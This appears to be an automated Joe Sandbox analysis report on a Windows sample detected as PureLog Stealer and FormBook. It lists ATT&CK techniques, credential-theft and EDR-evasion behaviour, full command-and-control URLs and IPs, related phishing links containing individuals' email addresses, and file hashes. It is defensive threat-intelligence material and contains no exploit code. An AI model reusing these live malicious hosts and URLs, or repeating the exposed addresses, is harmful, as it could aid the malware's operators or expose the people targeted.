                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2183096912.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		612
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		612
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1475272 Sample: nK1Y86mbzfbkwpB.exe Startdate: 17/07/2024 Architecture: WINDOWS Score: 100 69 www.techacademy.store 2->69 71 www.scottifqqy.online 2->71 73 8 other IPs or domains 2->73 81 Snort IDS alert for network traffic 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus / Scanner detection for submitted sample 2->85 87 11 other signatures 2->87 10 nK1Y86mbzfbkwpB.exe 7 2->10         started        14 GDhinOc.exe 5 2->14         started        signatures3 process4 file5 55 C:\Users\user\AppData\RoamingbehaviorgraphDhinOc.exe, PE32 10->55 dropped 57 C:\Users\user\...behaviorgraphDhinOc.exe:Zone.Identifier, ASCII 10->57 dropped 59 C:\Users\user\AppData\Local\...\tmp100A.tmp, XML 10->59 dropped 61 C:\Users\user\...\nK1Y86mbzfbkwpB.exe.log, ASCII 10->61 dropped 93 Uses schtasks.exe or at.exe to add and modify task schedules 10->93 95 Writes to foreign memory regions 10->95 97 Allocates memory in foreign processes 10->97 105 2 other signatures 10->105 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 schtasks.exe 1 10->21         started        99 Antivirus detection for dropped file 14->99 101 Multi AV Scanner detection for dropped file 14->101 103 Machine Learning detection for dropped file 14->103 23 RegSvcs.exe 14->23         started        25 schtasks.exe 1 14->25         started        27 RegSvcs.exe 14->27         started        29 RegSvcs.exe 14->29         started        signatures6 process7 signatures8 75 Maps a DLL or memory area into another process 16->75 31 hAtMBptzWt.exe 16->31 injected 77 Loading BitLocker PowerShell Module 19->77 33 WmiPrvSE.exe 19->33         started        35 conhost.exe 19->35         started        37 conhost.exe 21->37         started        39 hAtMBptzWt.exe 23->39 injected 42 conhost.exe 25->42         started        process9 signatures10 44 runas.exe 13 31->44         started        89 Maps a DLL or memory area into another process 39->89 91 Found direct / indirect Syscall (likely to bypass EDR) 39->91 47 runas.exe 39->47         started        process11 signatures12 107 Tries to steal Mail credentials (via file / registry access) 44->107 109 Tries to harvest and steal browser information (history, passwords, etc) 44->109 111 Modifies the context of a thread in another process (thread injection) 44->111 113 3 other signatures 44->113 49 hAtMBptzWt.exe 44->49 injected 53 firefox.exe 44->53         started        process13 dnsIp14 63 www.scottifqqy.online 185.179.189.181, 63893, 80 WEBHOST1-ASRU Russian Federation 49->63 65 ancuapengiu28.com 172.96.191.69, 63895, 63896, 63897 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada 49->65 67 2 other IPs or domains 49->67 79 Found direct / indirect Syscall (likely to bypass EDR) 49->79 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                nK1Y86mbzfbkwpB.exe53%ReversingLabsWin32.Trojan.Nekark
                nK1Y86mbzfbkwpB.exe100%AviraHEUR/AGEN.1362865
                nK1Y86mbzfbkwpB.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\GDhinOc.exe100%AviraHEUR/AGEN.1362865
                C:\Users\user\AppData\Roaming\GDhinOc.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\GDhinOc.exe53%ReversingLabsWin32.Trojan.Nekark

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                http://www.goodneighbor.club/qt04/0%Avira URL Cloudsafe
                http://www.techacademy.store/cf3x/0%Avira URL Cloudsafe
                http://goodneighbor.club/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn0%Avira URL Cloudsafe
                http://www.goodneighbor.club/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn+zvLQLmgMOdCvpj72y/6TLeiZkhB+jDoYQhv+31XsOucKp5ezTLwqyqsfzW87SAnA9l3fp1K+KRcztaDzuPfUxOD0ClFR9lOpz4Z3tTOcJt7Q=&BF=AP6PLVoH-l0%Avira URL Cloudsafe
                http://www.ancuapengiu28.com/d3vb/0%Avira URL Cloudsafe
                http://www.techacademy.store/cf3x/?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-l0%Avira URL Cloudsafe
                http://www.goodneighbor.club0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.scottifqqy.online
                		185.179.189.181
                		truetrue
                  		unknown
                  ancuapengiu28.com
                  		172.96.191.69
                  		truetrue
                    		unknown
                    www.techacademy.store
                    		13.248.169.48
                    		truetrue
                      		unknown
                      goodneighbor.club
                      		162.159.134.42
                      		truetrue
                        		unknown
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		unknown
                          www.goodneighbor.club
                          		unknown
                          		unknowntrue
                            		unknown
                            www.me-sa.online
                            		unknown
                            		unknowntrue
                              		unknown
                              206.23.85.13.in-addr.arpa
                              		unknown
                              		unknowntrue
                                		unknown
                                www.ancuapengiu28.com
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.goodneighbor.club/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn+zvLQLmgMOdCvpj72y/6TLeiZkhB+jDoYQhv+31XsOucKp5ezTLwqyqsfzW87SAnA9l3fp1K+KRcztaDzuPfUxOD0ClFR9lOpz4Z3tTOcJt7Q=&BF=AP6PLVoH-ltrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.goodneighbor.club/qt04/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ancuapengiu28.com/d3vb/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.techacademy.store/cf3x/?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-ltrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.techacademy.store/cf3x/true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://ac.ecosia.org/autocomplete?q=runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/chrome_newtabrunas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://duckduckgo.com/ac/?q=runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icorunas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrunas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.ecosia.org/newtab/runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://goodneighbor.club/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmnrunas.exe, 00000011.00000002.3358247281.000000000539A000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000002.3357539718.000000000322A000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenK1Y86mbzfbkwpB.exe, 00000000.00000002.2180682154.00000000027F6000.00000004.00000800.00020000.00000000.sdmp, GDhinOc.exe, 00000008.00000002.2407319175.0000000002B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.goodneighbor.clubhAtMBptzWt.exe, 00000016.00000002.3353699793.000000000088D000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  13.248.169.48
                                  		www.techacademy.storeUnited States
                                  		16509AMAZON-02UStrue
                                  162.159.134.42
                                  		goodneighbor.clubUnited States
                                  		13335CLOUDFLARENETUStrue
                                  172.96.191.69
                                  		ancuapengiu28.comCanada
                                  		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                  185.179.189.181
                                  		www.scottifqqy.onlineRussian Federation
                                  		44094WEBHOST1-ASRUtrue

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1475272
                                  Start date and time:2024-07-17 18:58:04 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 43s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:3
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:nK1Y86mbzfbkwpB.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@26/12@6/4
                                  EGA Information:
                                  • Successful, ratio: 83.3%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 147
                                  • Number of non-executed functions: 327
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target hAtMBptzWt.exe, PID 3172 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: nK1Y86mbzfbkwpB.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  12:58:52API Interceptor1x Sleep call for process: nK1Y86mbzfbkwpB.exe modified
                                  12:58:58API Interceptor16x Sleep call for process: powershell.exe modified
                                  12:59:01API Interceptor1x Sleep call for process: GDhinOc.exe modified
                                  13:00:18API Interceptor822664x Sleep call for process: runas.exe modified
                                  18:58:58Task SchedulerRun new task: GDhinOc path: C:\Users\user\AppData\Roaming\GDhinOc.exe

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  13.248.169.48SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                  • www.ansverity.com/7llb/
                                  OrderPI.exeGet hashmaliciousFormBookBrowse
                                  • www.cetys.com/6uii/
                                  PO HA25622.exeGet hashmaliciousFormBookBrowse
                                  • www.webmedianews.com/h209/?Dzrx=fA8Yes4AKfUDc53Wnj6AqZfIYHxfB2WY7SMSertcKD9M3ZyyZdC5GDMmxBggMfVQA7Zc&mlYT=SxolxB
                                  IMG_00110724.exeGet hashmaliciousFormBookBrowse
                                  • www.ansverity.com/7llb/
                                  SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exeGet hashmaliciousFormBookBrowse
                                  • www.ansverity.com/7llb/
                                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                  • www.ansverity.com/7llb/
                                  PTT Group project - Quotation.exeGet hashmaliciousFormBookBrowse
                                  • www.webuyfontana.com/cns4/
                                  80TeZdsbeA6B6j4.exeGet hashmaliciousFormBookBrowse
                                  • www.realtors.biz/mc10/?ejn=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/XlvHoWwQQ/&vVjLC=M6Ah
                                  RFQ - MK FMHS.RFQ.24.101.exeGet hashmaliciousFormBookBrowse
                                  • www.webuyfontana.com/cns4/
                                  disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                  • www.realtors.biz/mc10/?FPWhWLW=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/bcjmEWnWMuFtbCmA==&AlB=8pdT8tsp
                                  162.159.134.42Petromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                  • www.goodneighbor.club/arws/
                                  CC-CREDIT CARD-itineraries.exeGet hashmaliciousFormBookBrowse
                                  • www.goodneighbor.club/ua6w/?L0WX3=VguSblgGE2gr11HyBT7GooCC0H7LwBOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXPO2P1jxDbVWq76NrnMwukHi5CRjf6Y7B46k=&_4B=Rxm4iVs
                                  http://heritageconsultants.comGet hashmaliciousUnknownBrowse
                                  • heritageconsultants.com/
                                  http://www.heritageconsultants.com/Get hashmaliciousUnknownBrowse
                                  • www.heritageconsultants.com/
                                  http://www.standardmediaindex.comGet hashmaliciousUnknownBrowse
                                  • www.standardmediaindex.com/
                                  sCzFNAYGKI.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                                  • redrivergorge.com/admin
                                  3yPvcmrbqS.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5SystemzBrowse
                                  • directa-plus.com/administrator/
                                  Documents.exeGet hashmaliciousFormBookBrowse
                                  • www.shufiya.com/gd12/?DPZl=5jUDTf-HoZs&R0Gh=4IUdDy7qYcz3Aj6r2+dL3f372ATDValOWy994H4bQvMIP2krqm+IJVbZ16vdXjwxdhOF
                                  php.iniGet hashmaliciousUnknownBrowse
                                  • thefortcollins.dentist/
                                  graph.exeGet hashmaliciousUnknownBrowse
                                  • www.filmworkz.com/toolport/ver.txt

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  natroredirect.natrocdn.comPetromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                  • 85.159.66.93
                                  INV90097.exeGet hashmaliciousFormBookBrowse
                                  • 85.159.66.93
                                  Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                  • 85.159.66.93
                                  AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                  • 85.159.66.93
                                  Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                  • 85.159.66.93
                                  Document TOP19928.exeGet hashmaliciousFormBookBrowse
                                  • 85.159.66.93
                                  U prilogu lista novih narudzbi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                  • 85.159.66.93
                                  wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                  • 85.159.66.93
                                  opp46lGmxd.exeGet hashmaliciousFormBookBrowse
                                  • 85.159.66.93
                                  mzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                  • 85.159.66.93

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WEBHOST1-ASRUhttps://tr.alertsgame.ru/Get hashmaliciousUnknownBrowse
                                  • 91.236.136.126
                                  https://tr.alertsgame.ru/Get hashmaliciousUnknownBrowse
                                  • 91.236.136.126
                                  https://tr.alertsgame.ru/Get hashmaliciousUnknownBrowse
                                  • 91.236.136.126
                                  https://tr.alertsgame.ru/Get hashmaliciousUnknownBrowse
                                  • 91.236.136.126
                                  LockyRansom.exeGet hashmaliciousUnknownBrowse
                                  • 185.179.190.31
                                  LockyRansom.exeGet hashmaliciousUnknownBrowse
                                  • 185.179.190.31
                                  Nitro.exeGet hashmaliciousAsyncRATBrowse
                                  • 45.84.1.233
                                  SecuriteInfo.com.Win32.Evo-gen.26417.20881.exeGet hashmaliciousAsyncRATBrowse
                                  • 45.84.1.233
                                  zY7L2l2Gt6.exeGet hashmaliciousNetSupport RATBrowse
                                  • 45.67.230.205
                                  zY7L2l2Gt6.exeGet hashmaliciousNetSupport RATBrowse
                                  • 45.67.230.205
                                  AMAZON-02UShttps://i.mqz7or.com/l/#1barry.doan@firstontario.comGet hashmaliciousTycoon2FABrowse
                                  • 13.32.145.9
                                  https://o.mqz7or.com/y/#7cynthia.crappere@firstontario.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 108.156.39.22
                                  https://5.rcestershir.com/u/#abernadette.rigo@firstontario.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 3.162.38.104
                                  https://5.rcestershir.com/u/#abernadette.rigo@firstontario.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 13.33.187.96
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 3.165.136.19
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 3.165.136.26
                                  https://trk.klclick3.com/ls/click?upn=u001.I9LhpOxgCcXrD8xJgdEO8WUi5tV6wurQhjXRfDAEMS-2FcMa0g0FTnahsI5IEFHinKC-2FGj8kpAqnaoI6Qoa3vFLySKKSAfv0Wxu2Dy-2BRyMntsvwfzFfHILPHPRV90LmePFgMglDqCtK67PLGfWxTEMO93TwkvZZtNoI477LbXPoBjcrwXEgXl1dr5-2Bsbz8VZiUNXN768BEIA-2BYnNr4FIu9nA-3D-3DATse_RSmWOI3fPdFDxAydigDPQ0uJwuQ-2FUs3Wu1xZT2pFOHtvwUa8-2Ftks3ld44BID-2BJgD3ps4M8U7HlIP10yVJ6ZeFvrA3iSG0rco-2Fzt7OL4FXId6TCwVFcQcW-2F2E-2Faa3q7Weo2xYvFD1h9l7jEVdzkUp4Kp77hFD1XYDRoeiAzaz-2BFA4Srg7EiFD-2BO6F2w7c4O0pEK7boN40RNA-2F8TusPddYFOH48pk30jzUw7CYeSygfO9hZkczhRjxavPfa15ZQShZu24zwPQtiM5rYtaL0zKZeMvKbYsdrel3rTSJBLKXR2MMcVfiOQJo1JHVPclcvULrA5xewzIBFupBKpLaDZv1KWbZjd-2F-2BEE4MzV1Vme-2FCaJxOXBca4gsTghUHHiiDIxlLzjYnWoXwKNHeSslKR-2BUfUjOwwSmF8fN79-2FzJVuaw4lasmT9EvZxZK-2BAH7JlY5rrgFg8Woxh0SAeruKYO5LevAgBmW3c5sr-2F85S8FCROz5cY3UDqnpYtBxr1o9XTEZg-2FV#O07qxE-SUREJACKbXJvbWVyb0BkYWlpY2hpLXNhbmt5by5ldQ==Get hashmaliciousUnknownBrowse
                                  • 108.156.60.30
                                  https://sharepoint-capcounsel.com/Get hashmaliciousHTMLPhisherBrowse
                                  • 18.184.193.10
                                  https://links.aimarketupdates.com/u/click?_t=007c8d3169964357a567583be3759899&_m=4ea0ea1bd832476385a969490a2fc97e&_e=eqsHaQzsqtuCBU4cjDCgp01WTMG-_xF0_zPeEcn5TvgDliLiLzqmrOFu6PEmBd8l4eUowEbdY2HGbDEt0pGnvEt7kjHrlvXxoLxfE46OIlHNWu3diefrdA7VS-gvhlNeWXcmQJcb-K5SDaQZbQTwGQd5isj6R3r0VBDsOI-iTGQ1hbpwPmIGeddjCGhSb-v2SlYhA9ojX30WJ8x3W4eetXB2bx4euqlvMaP3t67I57cNYUuRHdJVlmbD-MEaYgYSIcCMgwVQNnqQsJbZ-9kf6iTd94Y2-7Qbkwx6Pc2XEaA%3DGet hashmaliciousUnknownBrowse
                                  • 52.33.181.156
                                  http://appliedcryotech.comGet hashmaliciousUnknownBrowse
                                  • 54.247.172.86
                                  CLOUDFLARENETUSswiftcopy_dg2s7veypnpdql9xfoys.rtfGet hashmaliciousTycoon2FABrowse
                                  • 104.17.25.14
                                  swiftcopy_dg2s7veypnpdql9xfoys.rtfGet hashmaliciousTycoon2FABrowse
                                  • 104.17.25.14
                                  https://i.mqz7or.com/l/#1barry.doan@firstontario.comGet hashmaliciousTycoon2FABrowse
                                  • 104.17.25.14
                                  p_view_20241106.pdfGet hashmaliciousUnknownBrowse
                                  • 104.26.15.225
                                  SecuriteInfo.com.Trojan.PackedNET.2979.30935.7426.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  • 188.114.97.3
                                  https://o.mqz7or.com/y/#7cynthia.crappere@firstontario.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 104.17.25.14
                                  swiftcopy_3fnmfcx1jx6ynxrhldz2.rtfGet hashmaliciousTycoon2FABrowse
                                  • 104.17.25.14
                                  https://5.rcestershir.com/u/#abernadette.rigo@firstontario.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 104.17.25.14
                                  Doc 0001_RFQ _MV_Vilnius provision.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  https://5.rcestershir.com/u/#abernadette.rigo@firstontario.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 188.114.96.3
                                  LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGYour file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                  • 209.58.164.109
                                  HSBC Bank_Approvel Letter.exeGet hashmaliciousFormBookBrowse
                                  • 209.58.164.109
                                  https://103.150.10.45:8443/Get hashmaliciousUnknownBrowse
                                  • 103.150.10.45
                                  PHHOjspjmp.exeGet hashmaliciousCMSBruteBrowse
                                  • 209.58.180.90
                                  FEB-MAR SOA 2024.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.96.191.121
                                  YHZj3QW0oh.exeGet hashmaliciousRemcosBrowse
                                  • 23.106.121.144
                                  w0vFb4jHKs.exeGet hashmaliciousRemcosBrowse
                                  • 23.106.121.144
                                  CITIBANK EUROPE PLC. SWIFT TRANSFER (008) CMSWT24019000690.exeGet hashmaliciousRemcosBrowse
                                  • 23.106.121.133
                                  Swift copy of payment.exeGet hashmaliciousRemcosBrowse
                                  • 23.106.121.133
                                  PQ84eqzrOt.exeGet hashmaliciousRemcosBrowse
                                  • 23.106.121.144

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GDhinOc.exe.log

                                  Download File
                                  Process:C:\Users\user\AppData\Roaming\GDhinOc.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:false
